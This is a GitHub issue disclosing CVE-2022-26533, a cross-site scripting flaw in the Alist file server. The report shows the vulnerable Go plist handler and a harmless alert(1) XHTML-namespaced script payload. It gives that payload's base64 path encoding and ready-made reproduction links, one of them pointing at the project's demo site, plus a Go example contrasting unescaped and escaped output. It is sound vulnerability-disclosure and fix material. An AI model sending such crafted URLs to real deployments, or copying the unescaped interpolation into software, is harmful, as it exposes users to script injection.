CVE-2022-26533: Alist has Cross Site Scripting (XSS) vulnerability · Issue #645 · Xhofe/alist

Alist v2.1.0 and below was discovered to contain a cross-site scripting (XSS) vulnerability via /i/:data/ipa.plist.


Alist Version

v2.0.10-v2.1.0

Describe the bug

Vulnerability Introduction

A route in Alist takes a user-supplied path parameter, decodes it, and embeds it in an XML (plist) response without filtering or escaping, which allows XSS.

Vulnerability affects version: v2.0.10-v2.1.0

Vulnerability Analysis

A new route was added in Alist v2.0.10, /i/:data/ipa.plist, in which the `data` path parameter is fully controlled by the requester.


Simplified code:

```go
func Plist(c *gin.Context) {
	data := c.Param("data")
	// undo the path-safe substitution: "_" stands for "/", "-" stands for "="
	data = strings.ReplaceAll(data, "_", "/")
	data = strings.ReplaceAll(data, "-", "=")
	bytes, err := base64.StdEncoding.DecodeString(data)
	if err != nil {
		common.ErrorResp(c, err, 500)
		return
	}
	u := string(bytes)
	// name is assigned elsewhere in the full handler; omitted from this simplified excerpt
	plist := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> … <string>%s</string> … <string>ci.nn.%s</string> … <string>%s</string> … `, u, name, name)
	c.Header("Content-Type", "application/xml;charset=utf-8")
	c.Status(200)
	_, _ = c.Writer.WriteString(plist)
}
```

The incoming data is base64-decoded after reversing the substitution of the characters that conflict with URL paths (`_` back to `/`, `-` back to `=`). The decoded string `u` is then spliced straight into the XML and written to the response without any escaping, so we can use it to inject markup. Because the response is served as application/xml, the browser renders it as an XML document, and a script element declared in the XHTML namespace executes:

<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

The payload, base64-encoded:

PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4=

Replace `=` with `-`, then splice it into the path:

http(https)://<host:port>/i/PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4-/ipa.plist
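The following is an added example, not Alist's own code, that makes the encoding round trip and the fix concrete. It re-implements the decode step from the simplified handler above, the encode step the report performs by hand (base64, then `/` to `_` and `=` to `-`), and places the vulnerable interpolation beside a hardened variant that escapes the decoded value with `encoding/xml`'s `EscapeText` before it is formatted into the document. The plist template is a cut-down stand-in (assumption: only the `<string>` holding the URL matters for the bug); the payload is the one from the report.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"strings"
)

// decodeData reverses the path encoding the /i/:data/ipa.plist route expects:
// "_" stands in for "/" and "-" for "=", so a standard base64 string survives
// as a single URL path segment. This mirrors the decode step of the handler.
func decodeData(data string) (string, error) {
	data = strings.ReplaceAll(data, "_", "/")
	data = strings.ReplaceAll(data, "-", "=")
	b, err := base64.StdEncoding.DecodeString(data)
	if err != nil {
		return "", err
	}
	return string(b), nil
}

// encodeData is the inverse, i.e. the steps the report walks through by hand:
// base64-encode, then swap "/" for "_" and "=" for "-".
func encodeData(u string) string {
	s := base64.StdEncoding.EncodeToString([]byte(u))
	s = strings.ReplaceAll(s, "/", "_")
	return strings.ReplaceAll(s, "=", "-")
}

// plistTemplate is a cut-down stand-in for the plist the handler emits
// (assumption: the real template carries more keys; only the url string matters here).
const plistTemplate = `<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict><key>url</key><string>%s</string></dict></plist>`

// vulnerablePlist reproduces the flaw: the decoded value is interpolated as-is.
func vulnerablePlist(u string) string {
	return fmt.Sprintf(plistTemplate, u)
}

// safePlist is the hardened form: the decoded value is escaped as XML
// character data, so "<" becomes "&lt;" and no element can be injected.
func safePlist(u string) string {
	var buf bytes.Buffer
	_ = xml.EscapeText(&buf, []byte(u)) // writes to bytes.Buffer do not fail
	return fmt.Sprintf(plistTemplate, buf.String())
}

// injectsElement reports whether a rendered plist contains the raw
// XHTML-namespaced script element from the report's payload.
func injectsElement(plist string) bool {
	return strings.Contains(plist, "<a:script")
}

func main() {
	// Constructed input for this example: the payload from the report.
	payload := `<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>`
	seg := encodeData(payload)
	fmt.Println("path segment:", seg)

	u, err := decodeData(seg)
	if err != nil {
		panic(err)
	}
	fmt.Println("vulnerable output injects script:", injectsElement(vulnerablePlist(u)))
	fmt.Println("escaped output injects script:   ", injectsElement(safePlist(u)))
}
```

Running it prints the same path segment as the reproduction link, and shows that only the unescaped variant carries the raw script element. The minimal fix is to escape `u` (or emit the plist through `encoding/xml`'s `Encoder`) rather than `fmt.Sprintf` it into the string; since the value is meant to be a download URL, the stricter check is to parse it with `net/url` and reject anything that is not an http or https URL before it reaches the template.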

Vulnerability Exploitation

After reproducing the exploit locally, it was tested against the official demo site:


Reproduction link

https://alist.xhofe.top/i/PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4-/ipa.plist

Logs

No response
